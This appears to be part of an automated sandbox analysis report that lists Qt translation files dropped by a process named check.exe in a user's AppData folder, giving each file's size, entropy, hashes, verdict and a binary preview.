                                                                                                                                                                                                            Preview:<.d....!..`.......slB..<....*.......+.......@...C...A.......B...<...C.......D...2...E.......F...d...G.......H...W...I.......P.......Q.......R.......S...x...T.......U...n...V...%...W.......X.......Y.......]..g~...t...V.......f..................................;..G....;..[....;...q...;..ia...;... ...M..g....O.......O.......[..,e...........}..g....m..h........Q..(5......+;..2...+;...b..+;...i..+O..2...+O...4..1......E@......F.......H4......HY...%..H.......I.......I@......IA...9..IC......J...6...J.......J.......J...^...K...7...LD......L....n..PS...U..R.......T....=..Zr......[`...V..[`......\...!,..\...8U.._..."b.._.../h..1.......E...9......4...............5........e...................$...<...$..Z....[.......,.......y...L...y..].......H.......@.......J.......6........~..........E...O...E..+....E...~..............,1...%..8r...%...........^..............................5.......0..Gx...0.......0..P....0..h....0.......0.......5...^.......... D...... D......+....`..,.......,...-...<U
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):65851
                                                                                                                                                                                                            Entropy (8bit):4.7906769989650515
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:4u6DkpgyKmRmG15mGM6iFPi6Q/qTlOQZY2dKN8gKw:4u6DotUG1sGMZPi6Q/qTlO2Y2YKw
                                                                                                                                                                                                            MD5:0E85E0E0E7DDFE3D4BDE302F27047F9C
                                                                                                                                                                                                            SHA1:AE59348E0C2E4F86F99DA6CF5DAB3B7E92504B7C
                                                                                                                                                                                                            SHA-256:4B4B6FF7FD237C9DA0301B4946132E68653D15EB5FAF38E4C5FBFEBB12DD97F7
                                                                                                                                                                                                            SHA-512:8CAAB6C61E9FA26A3A289A9E4DC515D157B3092D6D4ED43861220261BD2B7CC79B35B52F9ADE4EF558B5385B37EAC14575420DD55C475F435BB95B6C1E2561B6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`...B.......*.......+...i...]..6....;.......;..-f...;..:;...;..t....;.......M..64...O.......O...........q...}..6\...m..6........(..+;......+;..7...+;..=...+O......+O..7c..H4......H.......J.......K....F..LD...+..L.......PS...N..Zr......[`...7..[`...N..\...h4.._....J.._....k..1...>...............7........}......D............,...........*......i....................................%.......%..Fc.......6...0.......0..9....0..q....0..t....0.......0.......5.......5...... D..<}.. D..I...+.......,...=X..,.......<U..r...<U...n..<.......F...=...F....F..H5......H5..<...H5..J4..H5......f.......f...1V..f...:f..f...H;..f...t&..f.......f.......l..................8......;z..............<.......Je.......6...`...&...`...!.......9......1....e.......e..=....e..J..............g...y.....*.y.../.*.y..h..*.y.....*.T..J..*.0..'[.*.0...K.+F...q..+F.....+f......+f...A..+.z../..+.......+....i`.+.....X.+.z../..+.....S.+....7..+....Bi.+....K..+....q..+.......+......+...i..+.....+....0..F0i.....G.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):110
                                                                                                                                                                                                            Entropy (8bit):3.630483009136986
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/7zl9lAlHekDN/01MULV4LlI+rwtbWlM+N:Cw5+wUGRIRt6n
                                                                                                                                                                                                            MD5:16CDF5B9D48B0F795D532A0D07F5C3A0
                                                                                                                                                                                                            SHA1:6E403C9096B3051973E2B681DFEBBC8DD024830D
                                                                                                                                                                                                            SHA-256:F574A2CFD4715885C3DBDF5AE60995252673BD94FDAA9586F7E0586F6C1AC0EE
                                                                                                                                                                                                            SHA-512:36A0431368010157EA8A45DCB00458076CCFFC08B37E443DEBD1AAD4A30C6080803337725A7A3DCBF2B410DC7BE89CEAF6C07C46F876E4EF5B08159E3BF38E6D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......tr....R.....q.t.b.a.s.e._.t.r.....q.t.s.c.r.i.p.t._.t.r.....q.t.m.u.l.t.i.m.e.d.i.a._.t.r
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):164
                                                                                                                                                                                                            Entropy (8bit):4.021402900389864
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/ZlRlAlHekCczOp1MUKUt7KlI+rwtbWlM/cFKIPldkONRMugB:CwUl0+rjIUKUcIRt6M/oioM3
                                                                                                                                                                                                            MD5:9B101363343847FE42167183320C03F0
                                                                                                                                                                                                            SHA1:F0DF2CFF913E588B7CADFDABBF69F4F632B2F96A
                                                                                                                                                                                                            SHA-256:F1621E680E1642F9463E4B07E7E78B50F9A7BDB7C321D7302039CB3405CBDEA4
                                                                                                                                                                                                            SHA-512:DA14FDF8DB514902733CAAC492293873351C595EBBE0ACB0849BECE24AB822602EE64D01051F1426CD1FC13A95D8607302CF9B515D9806FDD3BD047087DE447C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......uk....v.....q.t.b.a.s.e._.u.k.....q.t.s.c.r.i.p.t._.u.k.....q.t.m.u.l.t.i.m.e.d.i.a._.u.k... .q.t.x.m.l.p.a.t.t.e.r.n.s._.u.k........)......,..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):117347
                                                                                                                                                                                                            Entropy (8bit):5.8593733369029195
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:51dXW89nqEFu54aekvRzHHSVuf8j2+/xc3lhnbsfdAoz/w:v9qEFeLekvRznSVHJG3lhn+djY
                                                                                                                                                                                                            MD5:0D02F0DE5A12BCB338B7042DFBDAACF3
                                                                                                                                                                                                            SHA1:B7C10D249D8986AD8C6939B370407D07227A39F5
                                                                                                                                                                                                            SHA-256:28CDE75D7B32C81FEF1D4630C37B79A61DEC24B357632FF00D6365A57D8BE43B
                                                                                                                                                                                                            SHA-512:21F02EBA36B4411921EA3C70310B8E454E8FC2B8F09957FD6A63B71689DC381F7A5E2C3BDF2810734D659AB43D8A7BD46EF6436ECC52F75C71B5F5C313365444
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......zhB..+....*.......+.......@.......A...8...B.......C.......D.......E...V...F.......G...L...H.......I...9...P.......Q...e...R...^...S.......T...T...U.......V...|...W.......X...o...Y.......]..4 ...;...2...;..,....;..8....;.......;.......M..4H...O.......O...........#...}..4p...m..4........N..(5......+;...f..+;..6Y..+;..<...+O...8..+O..6'..1......E@......F....Y..H4..."..HY..J...H.......I.......J.......J.......K....5..LD..._..L......PS...V..Q....6..R...N...W..../..Zr.....[`.....[`......\...lU.._......._....L..1...<........j......6...............B........I...$..K....$.......,...g...y...3.......A......r...........................9..L7......;w...E..5b...E...G.......5...%.......%..D........`......*........................0.......0..8W...0..}y...0...6...0.......0.......5.......5...... D..:... D..J...+....R..,...;...,......<U..~...<U......<......F...;...F......H5...i..H5..:...H5..Jk..H5...w..VE...[..f....u..f...0X..f...9...f...E...f.......f.......f....j..g....A..l.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):141
                                                                                                                                                                                                            Entropy (8bit):3.7198292994386235
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/0N6xg/Rl/gl+kNXDelHrwtbWlMwTolIPldkOfDn:CwOO2+g6Mt63oloiUn
                                                                                                                                                                                                            MD5:ED4135D705AEF3D97F8BF6B8FF11F09C
                                                                                                                                                                                                            SHA1:308E2B8F74B863A61AD0B68F4A18ED06965EBEAA
                                                                                                                                                                                                            SHA-256:751ECDA0C33E061D91241268357FBD2F6B7F70A1116E714F28D22EFD61EC7A1A
                                                                                                                                                                                                            SHA-512:B6E6D00553A9C427130129B9D30E862028E549F372A832F0F05747C8E2A79E443F4932EC3AE177537C8BA00D26B5B6CB97D5B35426AB5229F6A468CA485BE0B1
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......zh_TW....n.....q.t.b.a.s.e._.z.h._.T.W...$.q.t.m.u.l.t.i.m.e.d.i.a._.z.h._.T.W...&.q.t.x.m.l.p.a.t.t.e.r.n.s._.z.h._.T.W
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):160017
                                                                                                                                                                                                            Entropy (8bit):5.35627970915292
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:XGlAMfkX1M0RdaCkR8lfv8vtc8EFrVYA2I4AJZWEWgHg1C8COvzHKHC6Jp9NV0V7:XUr0RACkIwDEpV1Lgf1ubtw3Bb
                                                                                                                                                                                                            MD5:A7E4D0BA0FC5DF07F62CC66EC9878979
                                                                                                                                                                                                            SHA1:21FD131B23BDD1BBA7BBB86F3ED5C83876F45638
                                                                                                                                                                                                            SHA-256:E03FE68D83201543698FD7FE267DD5DFC5BFD195147E74FF2F19AC3491401263
                                                                                                                                                                                                            SHA-512:D9E6B10506FCF20B5B783F011908083D9DF6C5DF88E21B10D07F53A01AD6506A4B921C85335A25BAE54E27BAD7D01B6E240D58FDEEAABC7FF32014EC120C2ECF
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......arB..2....*.......+.......@.......A.......B..._...C......D.......E......F.......G... ...H...D...I...h...P...C...Q...g...R......S.......T.......U.......V...x...W......X.......Y.......]..'=...s......t...........]...........;..'....;..(....;.......;.......M..'e...O.......O...9...........}..'........C...=......m..'....t..........!o..(5...Z..+;..5u..+;..c...+O......1...!...D@...8..E@.....H4...,..HY..QI..H.......IC......J....1..J.......J.......LD......L.......PS......QR...R..R...V2..T.......U....]..X.......Zr.....[`......\....t..]x......_......._.......yg......1...6....E..8V..............C............................$..RN...[...0...,.......y.......y...................K...........9..R....E.."............z.......................%..F;...D...[..................................!....5.......0...I...0.......0...5...0..#....5.......5...p..............W}.. D..(... D..P=..+.......<U......<U......<.......H5..(...H5..P...L.......VE......VE......V....B..f...JJ..f.......f.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):165337
                                                                                                                                                                                                            Entropy (8bit):5.332219158085151
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:9ULiyUxPoT6qx+J7FJlaaMJnxjqxq+0Uiff0mbVeb7wiEwYuYqDKBkKHMXHCIMll:9ULpIVFnpwUiEujw27ncUQUz
                                                                                                                                                                                                            MD5:660413AD666A6B31A1ACF8F216781D6E
                                                                                                                                                                                                            SHA1:654409CDF3F551555957D3DBCF8D6A0D8F03A6C5
                                                                                                                                                                                                            SHA-256:E448AC9E3F16C29EB27AF3012EFE21052DAA78FABFB34CD6DFF2F69EE3BD3CDB
                                                                                                                                                                                                            SHA-512:C6AE4B784C3D302D7EC6B9CE7B27DDAF00713ADF233F1246CD0475697A59C84D6A86BAA1005283B1F89FCC0835FD131E5CF07B3534B66A0A0AA6AC6356006B8F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......bg_BGB../....*..,....+..."...@...]...A.......B.......C.......D...P...E...!...F.......G.......H.......I.......P.......Q.......R...A...S...e...T.......U.......V.......W...1...X...U...Y...y...]..,....s...,...t...................P...;..+....;..-E...;..!....;..+....M..,Y...O...,...O...........*...}..,............=...Q...m..,....t...|......>...(5..1...+;..<...+;..o...+O...r..1...>...D@......E@......H4......HY..[...H.......IC......J....E..J....X..J.......LD......L....L..PS......QR.."...R...`...T....X..U.......X.......Zr...q..[`...`..\.......]x......_......._....T..yg.....1...=....E..?...............L(.......(...............'...$..\....[.......,...I...y...!...y...................S...........9..]%...E..5p...........z..!q...................%..O....D..................D.....8......:......?....5...&...0.......0.. ....0...c...0..5....5.......5..................b:.. D..-... D..Z...+.......<U......<U...0..<.......H5..-...H5..[...L.......VE..#a..VE..;...V.......f...T...f...!..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):210159
                                                                                                                                                                                                            Entropy (8bit):4.666388181115542
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:P/DVhdlafzvZfeW+6kXEVjSVPzC3ceKdP2:xYf7UW+WjwP2
                                                                                                                                                                                                            MD5:B383F6D4B9EEA51C065E73ECB95BBD23
                                                                                                                                                                                                            SHA1:DD6C2C4B4888B0D14CEBFC86F471D0FC9B07FE42
                                                                                                                                                                                                            SHA-256:52E94FCC9490889B55812C5433D009B44BDC2DC3170EB55B1AF444EF4AAE1D7F
                                                                                                                                                                                                            SHA-512:9401940A170E22CE6515E3C1453C563D93869A3C3686C859491A1F8795520B61BF3F0BFE4687A7380C0CC0C75E25559354FDB5CEF916AF4C5B6CD9661464A54A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......caB..7....*.......+.../...@..:P...A..:t...B..:....C..:....D..;=...E..<....F..<Z...G..<~...H..<....I..<....P..>....Q..>....R..?....S..?R...T..?v...U..?....V..?....W..@....X..@<...Y..@`...]../....s..1....t..........2s......#p...;.......;../....;..W....;..e+...M../3...O.......O..9.......J....}../]......8....=..9....m../....t..9Y.......S..(5..lB..+;.._...+;...=..+O..U...1.......D@..:...E@..?...H4...J..HY..~...H..."...IC...0..J....W..J....0..J.......LD..!...L...!f..PS..)...QR.."...R.......T...9~..U...9...U...z...X...>...Zr..E...[`...e..\...LD..]x..7U.._......._...M...yg..f...1...a....E..c....7.........U.......p........b.......4.......K...$.......[.......,.......y.......y...................^...........9...:...E...s...... (...z..":.......d......!....%..tQ...D.."......."......2......ve.....y...........5..#H...0...\...0..W+...0..';...0.......5..(....5..........)s.......... D..0w.. D..}...+...1...<?..5x..<U......<U..5...<...6@..H5..0...H5..~...L...9...VE..$...V...SV..f.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):174701
                                                                                                                                                                                                            Entropy (8bit):4.87192387061682
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:5WjuhX0CVRaakGjW9E8SSOQfX/JlwVOMxrboRPqWxXfQvO7zjBf:5iFGj1QfXr8Gd
                                                                                                                                                                                                            MD5:C57D0DE9D8458A5BEB2114E47B0FDE47
                                                                                                                                                                                                            SHA1:3A0E777539C51BB65EE76B8E1D8DCE4386CBC886
                                                                                                                                                                                                            SHA-256:03028B42DF5479270371E4C3BDC7DF2F56CBBE6DDA956A2864AC6F6415861FE8
                                                                                                                                                                                                            SHA-512:F7970C132064407752C3D42705376FE04FACAFD2CFE1021E615182555F7BA82E7970EDF5D14359F9D5CA69D4D570AA9DDC46D48CE787CFF13D305341A3E4AF79
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......cs_CZB..3p...*..F....+.......@..!....@..Ef...A..!....A..E....B.."1...B..E....C.."U...C..E....D.."....D..F....E..#p...E..F)...F..#....F..FP...G..#....G..Fw...H..$....H..F....I..$6...I..F....P..&%...P..Gr...Q..&I...Q..G....R..&....R..G....S..&....S..H....T..&....T..H8...U..'....U..H_...V..'Z...V..H....W..'~...W..H....X..'....X..H....Y..'....Y..H....]..,....]..,....s.......t...9...............*...;.......;..+....;..1B...;......;..?x...;..N....;..iY...;..s3...M..,B...M..,....O.......O...w...O..rr...........}..,j...}..-....... 5...=.. ....m..,....m..-8...t.. .......ay..(5..TT..+;...A..+;..B...+;..u...+O......+O..=a..1...a...D@.."...E@..&m..E@..G...F...J...H4...=..HY..`...H.......I...J...IC......J....-..J.......J.......LD......L....(..PS.....QR.."S..R...e...T.... ..U......X.......Zr...g..[`......\......]x......_......._......._...v...yg......1...C....E..E...............=.......Q........................s...$..a....[.......,.......y.......y...y..............G..........
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):181387
                                                                                                                                                                                                            Entropy (8bit):4.755193800761075
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:XzswP2UvZ5aZ9jFTkmq/gnBNW/+PcWrqm2Vliz0DGdaS4KSLZjwTTgwUR0toT:j3m27AjCT
                                                                                                                                                                                                            MD5:859CE522A233AF31ED8D32822DA7755B
                                                                                                                                                                                                            SHA1:70B19B2A6914DA7D629F577F8987553713CD5D3F
                                                                                                                                                                                                            SHA-256:7D1E5CA3310B54D104C19BF2ABD402B38E584E87039A70E153C4A9AF74B25C22
                                                                                                                                                                                                            SHA-512:F9FAA5A19C2FD99CCD03151B7BE5DDA613E9C69678C028CDF678ADB176C23C7DE9EB846CF915BC3CC67ABD5D62D9CD483A5F47A57D5E6BB2F2053563D62E1EF5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......daB..4....*..h....+......@...f...A.......B.......C.......D...U...E.......F...v...G.......H.......I.......P.......Q.......R...6...S...Z...T...~...U.......V.......W..."...X...F...Y...j...]..+....s.......t..................-...;..+....;..,....;../....;..;....M..+....O.......O...r...........}..,............=...8...m..,0...t...c......T...(5..B...+;..NH..+;..~H..+O..,...1...UP..D@......E@......H4...E..HY..j...H.......IC...#..J....J..J.......J.......LD......L....1..PS...B..QR......R...o...T.......U.......X.......Zr......[`...W..\....}..]x...[.._....-.._.......yg...e..1...O....E..R....7..........-!......]............................$..k....[...7...,.......y...c...y.................j4...........9..l8...E..p............z...;..................%..a....D...~.............-.....L......OH.....Uz...5.......0.......0...U...0.......0..p....5...7...5..L$..............p... D..-... D..i...+....@..<U.....<U.....<....S..H5..-2..H5..j$..L....B..VE.. ...VE..P...V...*...f...e...f.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):220467
                                                                                                                                                                                                            Entropy (8bit):4.626295310482312
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:7w8go8+ph6JVB8XVXYWpSNEeg8+vaD+p4N8DDiEKugwGZulh15ce4M+4NsPYXCZW:88h8Sj286tTiDD
                                                                                                                                                                                                            MD5:40760A3456C9C8ABE6EA90336AF5DA01
                                                                                                                                                                                                            SHA1:B249AA1CBF8C2636CE57EB4932D53492E4CE36AC
                                                                                                                                                                                                            SHA-256:553C046835DB9ADEF15954FA9A576625366BA8BFD16637038C4BCD28E5EBACE1
                                                                                                                                                                                                            SHA-512:068E55F39B5250CC937E4B2BD627873132D201D351B9351BE703CD9B95D3BAFB4BD649CB4DF120A976D7C156DA679758D952CAC5E0523107244E517D323BC0C5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......de_DEB..7....*.......+..3....@..R....A..R....B..S....C..S@...D..S....E..T]...F..T....G..T....H..T....I..U#...P..W....Q..W6...R..W....S..W....T..W....U..W....V..XG...W..Xk...X..X....Y..X....]..2%...s..J$...t..9R......J.......B....;..1....;..3....;..q....;.......M..2O...O.......O..X@......ia...}..2y......Q....=..Q....m..2....t..Q...........(5......+;..ev..+;......+O..oh..1....4..D@..R...E@..WZ..H4..4...HY...[..H...AY..IC..>o..J...>...J.......J...>6..LD..@A..L...@...PS..I...QR..#...R....h..T...W...U...Xh..U....~..X...]...Zr..e(..[`..)...\...j...]x..O..._....K.._...lI..yg...U..1...f....E..i....7..........o.......wG......6.......6.......8....$...n...[..8....,..9....y.......y..=................3......>....9.......E..."......?_...z..#d.......0......A%...%..z....D..A.......B......KP......2.............^...5..B....0.......0..p....0..F....0...}...5..G....5..........H........... D..3}.. D...O..+...Q...<?..Ti..<U......<U..T...<...U)..H5..3...H5......L...X...VE..%j..V...l..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):16
                                                                                                                                                                                                            Entropy (8bit):4.0
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4n:CwZ
                                                                                                                                                                                                            MD5:BCEBCF42735C6849BDECBB77451021DD
                                                                                                                                                                                                            SHA1:4884FD9AF6890647B7AF1AEFA57F38CCA49AD899
                                                                                                                                                                                                            SHA-256:9959B510B15D18937848AD13007E30459D2E993C67E564BADBFC18F935695C85
                                                                                                                                                                                                            SHA-512:F951B511FFB1A6B94B1BCAE9DF26B41B2FF829560583D7C83E70279D1B5304BDE299B3679D863CAD6BB79D0BEDA524FC195B7F054ECF11D2090037526B451B78
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`...
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):165170
                                                                                                                                                                                                            Entropy (8bit):4.679910767547088
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:JVwzuvb+Ta64KQd84arHX5pxiVhA8QlOD/BnFNa8NsvsfFsfcoZtIx6F:JVwSTG4KqVaLX5pEVK7OJFczstgRtIx8
                                                                                                                                                                                                            MD5:C7C58A6D683797BFDD3EF676A37E2A40
                                                                                                                                                                                                            SHA1:809E580CDBF2FFDA10C77F8BE9BAC081978C102B
                                                                                                                                                                                                            SHA-256:4FFDA56BA3BB5414AB0482D1DDE64A6F226E3488F6B7F3F11A150E01F53FA4C8
                                                                                                                                                                                                            SHA-512:C5AED1A1AA13B8E794C83739B7FDDEAFD96785655C287993469F39607C8B9B0D2D8D222ECD1C13CF8445E623B195192F64DE373A8FB6FE43743BAF50E153CDA5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......es_ESB../....*..*,...+...y...@.......A.......B.......C.......D...v...E...=...F.......G.......H.......I.......P.......Q... ...R...k...S.......T.......U.......V...1...W...U...X...y...Y.......]..+....s.......t...................c...;..+....;..,....;...%...;..#....;..-....M..+....O.......O...............}..,............=...]...m..,/...t..........A...(5..3...+;..<...+;..o...+O..!b..1...Ap..D@......E@...D..H4...-..HY..[F..H.......IC...%..J....L..J.......J.......LD......L....O..PS......QR..!...R...`K..T.......U....&..X.......Zr.....[`...h..\......]x...|.._....Y.._....A..yg......1...=....E..?a......!.......K........G...............R...$..\Q...[.......,...z...y.......y..................+............9..\....E..2............z.. ....................%..ON...D........................:......=B.....A....5...7...0.......0......0.."....0...,...0..3....5...}...5...Y..............a... D..-!.. D..Z6..+....0..<U...h..<U......<.......H5..-M..H5..Z...L.......VE.."...VE..>...V......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):179941
                                                                                                                                                                                                            Entropy (8bit):4.720938209922096
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:lvdTgO2Yl97ZWnbgTLt/Tf9IlqAeiy5uWkYGM0wNCdRjSK2YUlUs:lvdkA9vh5uWkY0MK2YXs
                                                                                                                                                                                                            MD5:8472CF0BF6C659177AD45AA9E3A3247C
                                                                                                                                                                                                            SHA1:7B5313CDA126BB7863001499FB66FB1B56C255FC
                                                                                                                                                                                                            SHA-256:E47FE13713E184D07FA4495DDE0C589B0E8F562E91574A3558A9363443A4FA72
                                                                                                                                                                                                            SHA-512:DE36A1F033BD7A4D6475681EDC93CC7B0B5DCB6A7051831F2EE6F397C971B843E1C10B66C4FB2EFF2A23DC07433E80FBF7B95E62C5B93E121AB5AD88354D9CB8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......fiB..38...*..ct...+......@.......A.......B.......C...@...D.......E...]...F.......G.......H.......I...#...P.......Q...6...R.......S.......T.......U.......V...G...W...k...X.......Y.......]..*....s...T...t.......................;..*....;..+....;..&....;..3....M..+!...O.......O...e...........}..+K...........=.......m..+w...t..........J...(5..9...+;..:y..+;..mW..+O..$...1...KY..D@......E@...Z..H4...l..HY..X&..H.......IC......J.......J...."..J......LD.....L.......PS...'..QR.. L..R...]...T.......U.......X.......Zr......[`......\.......]x......_....k.._....>..yg.. /..1...;....E..>....7..{(......%.......J........T.......&.......U...$..Y[...[......,...s...y.......y...a.......}......d...........9..Y....E..k'...........z...........V..........%..M....D...Q.......{......d.....A......E......K....5.......0.......0..&J...0.......0..k....5...*...5..I9.............._:.. D..,O.. D..W...+....9..<U...G..<U...*..<.......H5..,y..H5..W...H5......L....5..VE..!u..VE..E...V..."{..f.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):166167
                                                                                                                                                                                                            Entropy (8bit):4.685212271435657
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:CLZ1w8McowCppcPwL5pYFw+G00QsbLckCiWxvq+sjs06oFm:C91wxcowspc4L5pUw+cz39CiQ7tloFm
                                                                                                                                                                                                            MD5:1F41FF5D3A781908A481C07B35998729
                                                                                                                                                                                                            SHA1:ECF3B3156FFE14569ECDF805CF3BE12F29681261
                                                                                                                                                                                                            SHA-256:EDB32A933CEF376A2636634E14E2977CED6284E4AA9A4AC7E2292F9CA54C384A
                                                                                                                                                                                                            SHA-512:A492E8AC88095A38A13549C18C68E1F61C7054AB9362C2B04C65B93E48E4A07941C8DA6950BAE79041094623E0ED330CA975110FDE8248B4D9380B9F729AD891
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......fr_FRB../....*..-....+.......@.......A.......B.......C...?...D.......E...\...F.......G.......H.......I..."...P.......Q...5...R.......S.......T.......U.......V...F...W...j...X.......Y.......]..+....s...=...t.......................;..+....;..,....;.......;..$b...;.......M..,....O.......O...5...........}..,3...........=.......m..,]...t..........A...(5..5j..+;..<T..+;..o...+O.."+..1...B\..D@......E@...Y..H4...8..HY..[{..H.......IC......J.......J.......J.......LD...|..L.......PS...?..QR..!...R...`j..T.......U....[..X.......Zr.....[`...)..\......]x......_....7.._.......yg...i..1...=Q...E..?@......"Y......K............................$..\....[...^...,...'...y.......y...+.......o....../c.......Y...9..\....E..6(...........z..!................j...%..OC...D...+.......[......a.....;......>......B....5.......0.......0...m...0..#....0.......0..6....5.......5..................a... D..-Y.. D..Ze..+....]..<U...;..<U......<.......H5..-...H5..Z...L.......VE.."...VE..?...V......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):189580
                                                                                                                                                                                                            Entropy (8bit):4.630160941635514
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:SiaI3C87jhakhR0VGkw7ys7CskUH6y4e6IFB4xyMuhvDnJGhFaCo527arBbm07LZ:S2yGjh17yGqxTXhvQoejJd8FUjVgk
                                                                                                                                                                                                            MD5:EB1FB93B0BE51C2AD78FC7BA2F8B9F42
                                                                                                                                                                                                            SHA1:24F7FF809E2F11C579CD388FEA5A4C552FF8D4D0
                                                                                                                                                                                                            SHA-256:63B439DD44139AA3AED54C2EBE03FA9BC77F22C14ED8FBA8EFF2608445BB233D
                                                                                                                                                                                                            SHA-512:E13770AEF33B6666ED7D54E03EE20CA291D4167D673BA6C61D8E64CDD5F7FFE0A9521B95AF67BE719BF263932ECF16E2B2D0B5F3404F9BCD7879114FCC6FC474
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
